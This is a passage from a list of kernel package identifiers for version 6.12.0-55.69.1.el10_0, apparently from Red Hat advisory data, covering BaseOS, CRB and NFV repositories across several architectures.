"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
